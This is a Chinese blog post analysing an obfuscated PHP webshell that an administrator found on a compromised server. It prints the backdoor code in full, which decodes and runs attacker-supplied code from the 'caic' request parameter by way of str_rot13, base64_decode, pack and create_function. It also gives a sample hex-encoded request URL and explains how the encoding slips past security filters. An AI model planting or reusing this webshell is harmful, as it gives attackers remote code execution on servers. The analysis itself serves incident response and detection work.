分析一段webshell攻击的php代码(涉及函数pack、strrev、create_function、base64_decode)

今天服务器检测到一个紧急事件，查看了相关信息定位到一个php文件，打开后，发现异常一段代码，而且写得比较有意思，于是copy下来做了一下分析

$ContentS = trim(@$_REQUEST["caic"]);
if($ContentS){
    $S3 = strrev('31tor_rtS');//$S3=str_rot13
    $S4 = $S3('onfr64_qrpbqr'); //$S4=base64_decode
    $text = PACK($S4('SCo='),$ContentS); //$text=PACK('H*', $ContentS)
    $SS = $S4($S3('D3WyLKEyK0M1ozA0nJ9h')); //$SS=Create_Function
    $St = $SS('',$text);//$St=Create_Function('', PACK('H*', $ContentS))
    $St(); //执行$t返回的函数
    exit;
}

首先$ContentS 获取请求参数caic的值，这个值是由攻击者发出来的，一般请求是不会带这个参数的，获取到值后，还对值进行了一定程度的混淆处理，如果不是对整个代码很了解，很容易误以为是原应用的一部分而不处理，现在我们来分析下几个关键函数：

1、strrev() 对31tor_rtS 反转字符串处理，得到$S3=str_rot13；

2、$S4=str_rot13('onfre64_qrpbqr');最终$S4=base64_decode；

3、使用pack函数，对$ContentS进行打包（对这个函数不懂的，可以看这里https://blog.csdn.net/qq_34908844/article/details/79696135），其实这个地方才是写得比较精彩的地方，使用pack对字符串进行了一定程度的加密，使一般安全程序看不懂caic参数的实际作用，例如要实现在服务器运行下面这一行代码

echo "<script>document.write('hello word !')</script>";

只需要带参数访问：

http://example.com/?caic=6563686f20223c7363726970743e646f63756d656e742e7772697465282768656c6c6f20776f7264202127293c2f7363726970743e223b

因为caic值这样看来并没有什么异常，达到了穿透安全防护的作用。

虽然create_function函数在php7.2已弃用，但使用php5的应用还是不少，而且代码可以使用匿名函数替代实现相同的功能。